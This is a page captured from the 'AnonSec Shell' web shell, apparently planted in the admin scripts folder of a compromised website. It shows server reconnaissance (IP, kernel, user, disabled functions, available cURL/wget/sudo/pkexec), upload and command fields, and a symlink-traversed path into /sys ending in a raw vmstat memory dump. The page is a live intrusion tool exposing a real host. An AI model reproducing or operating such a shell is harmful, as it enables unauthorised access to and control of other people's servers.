AnonSec Shell
Server IP : 92.204.138.22  /  Your IP : 3.133.111.199
Web Server : Apache
System : Linux ns1009439.ip-92-204-138.us 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : internationaljou ( 1019)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/internationaljou/public_html/admin/js/BROKY_ADMIN/alfasymlink/root/sys/bus/cpu/devices/cpu2/node0/memory2/node0/memory2/node0/memory161/node0/memory137/node0/memory194/node0/memory252/node0/memory72/node0/memory153/node0/memory126/subsystem/devices/memory88/node0/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/internationaljou/public_html/admin/js/BROKY_ADMIN/alfasymlink/root/sys/bus/cpu/devices/cpu2/node0/memory2/node0/memory2/node0/memory161/node0/memory137/node0/memory194/node0/memory252/node0/memory72/node0/memory153/node0/memory126/subsystem/devices/memory88/node0/vmstat
nr_free_pages 1984309
nr_zone_inactive_anon 582488
nr_zone_active_anon 381455
nr_zone_inactive_file 2106216
nr_zone_active_file 1918726
nr_zone_unevictable 0
nr_zone_write_pending 419
nr_mlock 0
nr_bounce 0
nr_zspages 0
nr_free_cma 0
numa_hit 16687623110
numa_miss 0
numa_foreign 0
numa_interleave 36889
numa_local 16687623110
numa_other 0
nr_inactive_anon 582542
nr_active_anon 381455
nr_inactive_file 2106216
nr_active_file 1918726
nr_unevictable 0
nr_slab_reclaimable 191944
nr_slab_unreclaimable 118594
nr_isolated_anon 0
nr_isolated_file 0
workingset_nodes 51329
workingset_refault_anon 27434
workingset_refault_file 6774289
workingset_activate_anon 25781
workingset_activate_file 4579704
workingset_restore_anon 470
workingset_restore_file 573835
workingset_nodereclaim 58089
nr_anon_pages 576146
nr_mapped 78752
nr_file_pages 4412421
nr_dirty 419
nr_writeback 0
nr_writeback_temp 0
nr_shmem 379670
nr_shmem_hugepages 0
nr_shmem_pmdmapped 0
nr_file_hugepages 0
nr_file_pmdmapped 0
nr_anon_transparent_hugepages 810
nr_vmscan_write 188120
nr_vmscan_immediate_reclaim 1663
nr_dirtied 102135730
nr_written 84712388
nr_throttled_written 0
nr_kernel_misc_reclaimable 0
nr_foll_pin_acquired 0
nr_foll_pin_released 0
nr_kernel_stack 7792
nr_page_table_pages 9586
nr_swapcached 7809

Anon7 - 2022
AnonSec Team